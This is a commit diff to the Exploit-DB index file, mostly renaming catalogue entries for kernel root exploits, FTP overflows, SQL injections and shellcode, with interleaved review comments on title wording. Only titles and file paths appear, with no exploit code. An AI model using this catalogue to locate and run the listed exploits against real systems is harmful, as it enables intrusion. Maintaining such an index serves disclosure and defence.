DB: 2016-07-23

3 new exploits

Mandrake Linux 8.2 - /usr/mail Local Exploit
/usr/mail (Mandrake Linux 8.2) - Local Exploit

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)

Linux Kernel 2.2 - (TCP/IP Weakness) Exploit
Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit

CDRecord's ReadCD - Local Root Privileges
CDRecord's ReadCD - Local Root Exploit

NetBSD FTPd / tnftpd Remote Stack Overflow PoC
NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC

Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)

SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities
SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities
NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept
NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept
NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept
NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)

Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)

Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit
Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit

NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)
NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit

NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)
NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit

FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service
FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service

FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow

NetBSD 1.x TalkD User Validation
NetBSD 1.x TalkD - User Validation

FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition
FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition

Linux Kernel 2.4 - execve() System Call Race Condition PoC
Linux Kernel 2.4 - suid execve() System Call Race Condition PoC

Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)

Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)
Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)

NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow
NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow

OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service
OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service

Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)
Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)

Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption
Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption

Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities
Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities

Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root
Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit

NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow
NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow

VSAT Sailor 900 - Remote Exploit

Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)

Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation

Apple OS X Entitlements Rootpipe Privilege Escalation
Apple OS X Entitlements - 'Rootpipe' Privilege Escalation

OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)
OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)

OS X Install.framework suid root Runner Binary Privilege Escalation
OS X Install.framework - suid root Runner Binary Privilege Escalation

Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit

Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)
Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)

Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit

Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation
Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation

Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)
Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)

Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)
Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)

Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)
mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)
Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution
Offensive Security 2016-07-23 05:07:15 +00:00
parent 789febc361
commit be496c36bc
6 changed files with 475 additions and 45 deletions

@ -38,7 +38,7 @@ id,file,description,date,author,platform,type,port
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0
40,platforms/linux/local/40.pl,"/usr/mail (Mandrake Linux 8.2) - Local Exploit",2003-06-10,anonymous,linux,local,0
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port
142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0
143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
@ -225,7 +225,7 @@ id,file,description,date,author,platform,type,port
234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0
236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513
237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513
238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21
240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
@ -413,7 +413,7 @@ id,file,description,date,author,platform,type,port
465,platforms/php/webapps/465.pl,"PHP-Nuke SQL Injection Edit/Save Message(s) Bug",2004-09-16,iko94,php,webapps,0
466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
468,platforms/windows/dos/468.c,"Pigeon Server <= 3.02.0143 - Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0
469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Privileges",2004-09-19,"Max Vozeler",linux,local,0
469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Exploit",2004-09-19,"Max Vozeler",linux,local,0
470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0
471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66
472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0
@ -2550,7 +2550,7 @@ id,file,description,date,author,platform,type,port
2871,platforms/php/webapps/2871.txt,"LDU <= 8.x - (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0
2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0
2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0
2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) <= 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0
2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0
@ -8564,7 +8564,7 @@ id,file,description,date,author,platform,type,port
9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) Remote SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0
9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
@ -9004,7 +9004,7 @@ id,file,description,date,author,platform,type,port
9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
@ -9358,7 +9358,7 @@ id,file,description,date,author,platform,type,port
9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0
9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow / null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060
9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0
@ -10962,7 +10962,7 @@ id,file,description,date,author,platform,type,port
12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0
12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload",2010-04-01,indoushka,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - CSRF",2010-04-02,"pratul agrawal",php,webapps,0
12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0
@ -11539,8 +11539,8 @@ id,file,description,date,author,platform,type,port
12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0
12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0
12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload",2010-05-19,DigitALL,php,webapps,0
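Review bot: the two NetBSD titles (ids 12652 and 12653) keep the lowercase phrase "proof of concept" while the rest of this commit normalises that wording to "PoC" or "(Proof of Concept)" (compare id 25287 further down, renamed to "Bluetooth Signed Buffer Index (Proof of Concept) (1)"). Since these lines are being touched anyway, suggest "NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow (Proof of Concept)" and "NetBSD <= 5.0 - Hack PATH Environment Overflow (Proof of Concept)" so the descriptions stay searchable under one form.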
@ -12595,7 +12595,7 @@ id,file,description,date,author,platform,type,port
14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS",2010-07-12,Sid3^effects,php,webapps,0
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - (XSS/CSRF) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)",2010-07-12,anonymous,linux,local,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@ -13803,7 +13803,7 @@ id,file,description,date,author,platform,type,port
15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0
15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0
15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0
15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
@ -13822,7 +13822,7 @@ id,file,description,date,author,platform,type,port
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
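Review bot: the change to id 15944 is not a cosmetic rename like the others in this commit; it alters the target distribution from "Ubuntu 11.10" to "Ubuntu 10.10". That is consistent with the sibling entry id 15916 (same "Linux Kernel < 2.6.34" family, "Ubuntu 10.10 x86") and looks like a correction, but the commit message lists it as a plain title tweak. Suggest confirming the version against the header comment in platforms/linux/local/15944.c and calling the correction out explicitly in the commit message so the data change is not lost among the formatting edits.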
@ -15703,7 +15703,7 @@ id,file,description,date,author,platform,type,port
18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0
18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0
18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0
18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,Metasploit,windows,local,0
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
@ -16650,7 +16650,7 @@ id,file,description,date,author,platform,type,port
19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0
19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0
19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0
19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)",1998-06-27,Gutierrez,netbsd_x86,local,0
19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0
19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0
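Review bot: id 19261 keeps the underscore as the separator between platforms ("NetBSD <= 1.3.2_SGI IRIX <= 6.5.1"), whereas the other multi-platform titles in this same commit replace "_" with " / " (ids 19447, 19896, 20731, 21669). Suggest "NetBSD <= 1.3.2 / SGI IRIX <= 6.5.1 - at(1) Exploit" for consistency, which also moves the " - " to the usual position between target and description.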
@ -16814,7 +16814,7 @@ id,file,description,date,author,platform,type,port
19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0",1999-08-05,"Stefan Lauda",hardware,remote,0
19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS",1999-08-08,Narr0w,windows,dos,0
19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS",1999-08-08,rpc,multiple,dos,0
19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)",1999-08-09,"Ross Harvey",multiple,local,0
19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0
